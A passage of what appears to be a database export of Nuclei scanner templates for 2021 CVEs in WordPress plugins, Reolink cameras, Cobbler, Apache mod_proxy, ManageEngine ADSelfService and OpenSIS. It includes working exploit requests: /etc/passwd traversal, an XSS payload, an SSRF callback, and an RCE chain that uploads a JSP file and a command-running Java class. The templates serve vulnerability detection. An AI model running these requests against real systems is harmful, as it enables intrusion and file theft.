"hash": "83af387ce864a85546ebd39bd7fd4f69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a1" }, "name": "CVE-2021-39322.yaml", "content": "id: CVE-2021-39322\n\ninfo:\n name: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39322\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322\n - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39322\n cwe-id: CWE-79\n epss-score: 0.00234\n epss-percentile: 0.60718\n cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: cybernetikz\n product: easy_social_icons\n framework: wordpress\n tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9ee15a8abada7958e711aded015c8de9683c68642039c6bafcd88ef1ddceddf022100842ffd37deba2b63b5a7b9547f566896c8a2aa1054e7cc68f4d01ba1058be6e7:922c64590222798bb761d5b6d8e72950", "hash": "94076fc325f9ae621349ccf23123e58d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a2" }, "name": "CVE-2021-39327.yaml", "content": "id: CVE-2021-39327\n\ninfo:\n name: WordPress BulletProof Security 5.1 Information Disclosure\n author: geeknik\n severity: medium\n description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.\n impact: |\n An attacker can gain sensitive information from the target system.\n remediation: |\n Update to the latest version of WordPress BulletProof Security.\n reference:\n - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39327\n - http://packetstormsecurity.com/files/164420/WordPress-BulletProof-Security-5.1-Information-Disclosure.html\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2591118%40bulletproof-security&new=2591118%40bulletproof-security&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-39327\n cwe-id: CWE-459,CWE-200\n epss-score: 0.16259\n epss-percentile: 0.95861\n cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: ait-pro\n product: bulletproof_security\n framework: wordpress\n tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt'\n - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'BPS DB BACKUP LOG'\n - '=================='\n condition: and\n\n - type: regex\n negative: true\n part: body\n regex:\n - '^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$'\n\n - type: word\n part: header\n words:\n - 'text/plain'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220233e3ffbcf46436ba3a74ab76895ea774a623af8e1f44e28bb5fccbec915615e022007de70ce0060d07208fef78311d18a2f5acf3f43240aa92c7c751447062e05c6:922c64590222798bb761d5b6d8e72950", "hash": "4bfa9d669ea8e3361a722ba48eef7c10", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a3" }, "name": "CVE-2021-39350.yaml", "content": "id: CVE-2021-39350\n\ninfo:\n name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting\n author: gy741\n severity: medium\n description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39350\n - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39350\n cwe-id: CWE-79\n epss-score: 0.00104\n epss-percentile: 0.42206\n cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: foliovision\n product: fv_flowplayer_video_player\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"

    FV Player Stats

    \"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9544ea2a99ec897b7871a37a22dbe9bccc8b1ec287bd257eefcd143ba43c9b0022100cdfc5ef7b6494c579c2c558f7ea57a2811e5485f5f62b6070ae617a8b1b94dbd:922c64590222798bb761d5b6d8e72950", "hash": "d3a149c5d167b9c8ff870a48c8739c09", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a4" }, "name": "CVE-2021-39433.yaml", "content": "id: CVE-2021-39433\n\ninfo:\n name: BIQS IT Biqs-drive v1.83 Local File Inclusion\n author: Veshraj\n severity: high\n description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.\n reference:\n - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433\n - https://biqs-drive.be/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39433\n epss-score: 0.00637\n epss-percentile: 0.78687\n cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: biqs\n product: biqsdrive\n tags: cve2021,cve,lfi,biqsdrive,biqs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022045ba9ff8302706637947b44449b56a71b13f3b6d7038baa5c14980a6a1b951ed022100cb6dd26851e8c38528eb8ab2c68b2e3e7378d728c04da0e44b42ab87752924ab:922c64590222798bb761d5b6d8e72950", "hash": "9180cbc25a18f9b3e9330c66f365e8bc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a5" }, "name": "CVE-2021-39501.yaml", "content": "id: CVE-2021-39501\n\ninfo:\n name: EyouCMS 1.5.4 Open Redirect\n author: 0x_Akoko\n severity: medium\n description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability.\n reference:\n - https://github.com/eyoucms/eyoucms/issues/17\n - https://github.com/KietNA-HPT/CVE\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39501\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39501\n cwe-id: CWE-601\n epss-score: 0.00093\n epss-percentile: 0.38461\n cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyoucms\n product: eyoucms\n tags: cve2021,cve,redirect,eyoucms,cms\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4b0a00483046022100d016209aa95f121aad60021186d6a2c56623b790d5930cdffd96e00fdb5d2cbe022100e6536c22659a8f7fa88f0fa35686a7ad134c968f613c7471a7c3f6413618ee25:922c64590222798bb761d5b6d8e72950", "hash": "3b5dfff6ce86ffb5c6ce28d217b319a4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a6" }, "name": "CVE-2021-40149.yaml", "content": "id: CVE-2021-40149\n\ninfo:\n name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure\n author: For3stCo1d\n severity: medium\n description: |\n Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n impact: |\n An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera.\n remediation: |\n Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149\n - http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html\n - https://github.com/MrTuxracer/advisories\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.9\n cve-id: CVE-2021-40149\n cwe-id: CWE-552\n epss-score: 0.00942\n epss-percentile: 0.82739\n cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: reolink\n product: e1_zoom_firmware\n shodan-query: http.title:\"Reolink\"\n tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/self.key\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - '(?m)^-----BEGIN PRIVATE KEY-----'\n\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"application/html\"\n condition: and\n negative: true\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022073d439d60074e5d1c5d1337480dffdffea8f90c2d58d768b7d08a2c4498f585a02201a7e02758d8c5b5caf499e37224e8921c170b88c2dcc0be46064b4d10546f7d8:922c64590222798bb761d5b6d8e72950", "hash": "a136b5cd8da9ec8e84fa92e7825eb695", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a7" }, "name": "CVE-2021-40150.yaml", "content": "id: CVE-2021-40150\n\ninfo:\n name: Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure\n author: For3stCo1d\n severity: high\n description: |\n Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security.\n remediation: |\n Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150).\n reference:\n - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40150\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40150\n cwe-id: CWE-552\n epss-score: 0.01099\n epss-percentile: 0.82891\n cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: reolink\n product: e1_zoom_firmware\n shodan-query: http.title:\"Reolink\"\n tags: cve2021,cve,reolink,camera,exposure,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/conf/nginx.conf\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"server\"\n - \"listen\"\n - \"fastcgi\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202f6a6f1686de8b8b85a4c8c0e8a49bd69f1628bbea7bfd64bdfac2257741b25d022100f6dc5b8e874a47e6c22fa0f1890e646ce7ad62634e7547f215f4c2099198cd43:922c64590222798bb761d5b6d8e72950", "hash": "80f8e301581c02709827572abcf22a10", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a8" }, "name": "CVE-2021-40323.yaml", "content": "id: CVE-2021-40323\n\ninfo:\n name: Cobbler <3.3.0 - Remote Code Execution\n author: c-sh0\n severity: critical\n description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system.\n remediation: |\n Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability.\n reference:\n - https://github.com/cobbler/cobbler/releases/tag/v3.3.0\n - https://github.com/cobbler/cobbler/issues/2795\n - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40323\n - https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40323\n cwe-id: CWE-94\n epss-score: 0.03051\n epss-percentile: 0.90763\n cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cobbler_project\n product: cobbler\n tags: cve,cve2021,cobbler,rce,cobbler_project\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n find_profile\n \n \n \n \n \n name\n \n *\n \n \n \n \n \n \n \n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n generate_script\n \n \n \n {{profile}}\n \n \n \n \n \n \n \n \n \n /etc/passwd\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'text/xml'\n\n - type: regex\n regex:\n - \"root:.*:0\"\n - \"bin:.*:1\"\n - \"nobody:.*:99\"\n condition: or\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: profile\n group: 1\n regex:\n - '(.*?)'\n internal: true\n# digest: 4a0a0047304502206e4478c33e50a35d84d860a861a9f49e8343e5484089045ce8b3093e6faeac1a022100c816efd13f1937362330d8066062d1062b62bdd6a54dce8356e799717937f527:922c64590222798bb761d5b6d8e72950", "hash": "e69ac1d7419ff06613fd1aafe29278ae", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a9" }, "name": "CVE-2021-40438.yaml", "content": "id: CVE-2021-40438\n\ninfo:\n name: Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery\n author: pdteam\n severity: critical\n description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.\n remediation: Upgrade to Apache version 2.4.49 or later.\n reference:\n - https://firzen.de/building-a-poc-for-cve-2021-40438\n - https://httpd.apache.org/security/vulnerabilities_24.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40438\n - https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf\n - https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9\n cve-id: CVE-2021-40438\n cwe-id: CWE-918\n epss-score: 0.97372\n epss-percentile: 0.99897\n cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: http_server\n tags: cve2021,cve,ssrf,apache,mod-proxy,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/'\n\n host-redirects: true\n max-redirects: 2\n\n matchers:\n - type: dsl\n dsl:\n - 'contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")'\n - \"!contains(body, '

    Interactsh Server

    ')\"\n condition: and\n# digest: 4a0a00473045022100d8d05e6148126d10da099a868bd043059ea9cd59f882302a022663b194f4cbab0220434cac7a775e4c4845de5dd47b83c2c14723db31dcf51b091617be23b576b578:922c64590222798bb761d5b6d8e72950", "hash": "6ec38d2081dd7d79d7ba72f5a6b9e26c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083aa" }, "name": "CVE-2021-40539.yaml", "content": "id: CVE-2021-40539\n\ninfo:\n name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution\n author: daffainfo,pdteam\n severity: critical\n description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.\n remediation: Upgrade to ADSelfService Plus build 6114.\n reference:\n - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis\n - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\n - https://github.com/synacktiv/CVE-2021-40539\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40539\n - https://www.manageengine.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40539\n cwe-id: CWE-706\n epss-score: 0.97499\n epss-percentile: 0.99976\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp\n\nhttp:\n - raw:\n - |\n POST /./RestAPI/LogonCustomization HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"methodToCall\"\n\n unspecified\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"Save\"\n\n yes\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"form\"\n\n smartcard\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"operation\"\n\n Add\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%@ page import=\"java.security.MessageDigest\"%>\n <%\n String cve = \"CVE-2021-40539\";\n MessageDigest alg = MessageDigest.getInstance(\"MD5\");\n alg.reset();\n alg.update(cve.getBytes());\n byte[] digest = alg.digest();\n StringBuffer hashedpasswd = new StringBuffer();\n String hx;\n for (int i=0;i\n --8b1ab266c41afb773af2e064bc526458--\n - |\n POST /./RestAPI/LogonCustomization HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"methodToCall\"\n\n unspecified\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"Save\"\n\n yes\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"form\"\n\n smartcard\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"operation\"\n\n Add\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n --43992a07d9a30213782780204a9f032b--\n - |\n POST /./RestAPI/Connection HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n - |\n GET /help/admin-guide/test.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"114f7ce498a54a1be1de1f1e5731d0ea\" # MD5 of CVE-2021-40539\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c74e11c1bfb9c715d80f1c403010aa5a992ece98f99ff25aa12b5fdf7a4fe71c0220030dae45c7af30b2d89b390eb53b6bb2b534cf8be0e7c98a0cf98e490434fa5b:922c64590222798bb761d5b6d8e72950", "hash": "6fd0e469dfac83fb49031bc1d1bf4f32", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ab" }, "name": "CVE-2021-40542.yaml", "content": "id: CVE-2021-40542\n\ninfo:\n name: Opensis-Classic 8.0 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: |\n Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://github.com/OS4ED/openSIS-Classic/issues/189\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40542\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40542\n cwe-id: CWE-79\n epss-score: 0.00643\n epss-percentile: 0.78811\n cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: os4ed\n product: opensis\n shodan-query: http.title:\"openSIS\"\n tags: cve2021,cve,xss,opensis,os4ed\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950", "hash": "7eb5af80daa4d88fe3c6dc409b4538f4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ac" }, "name": "CVE-2021-40651.yaml", "content": "id: CVE-2021-40651\n\ninfo:\n name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion\n author: ctflearner\n severity: medium\n description: |\n OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n reference:\n - https://www.exploit-db.com/exploits/50259\n - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md\n - https://www.youtube.com/watch?v=wFwlbXANRCo\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40651\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-40651\n cwe-id: CWE-22\n cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*\n metadata:\n max-request: 2\n product: opensis\n vendor: os4ed\n shodan-query: \"title:\\\"openSIS\\\"\"\n tags: cve,cve2021,lfi,os4ed,opensis,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n USERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n\n - |\n GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - 'contains(body_1, \"openSIS\")'\n - \"status_code == 200\"\n condition: and\n# digest: 4b0a00483046022100b777c6dc91c4e0b6009c87ff6f67a70d09e714c2bd6a19cae6029a079bffc337022100936149daaf5ffa9f58ed3a99dc2885caedd9aa5ddc873eb8b48eff764af3110d:922c64590222798bb761d5b6d8e72950", "hash": "a343e9f65c759625befb36b163d00102", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ad" }, "name": 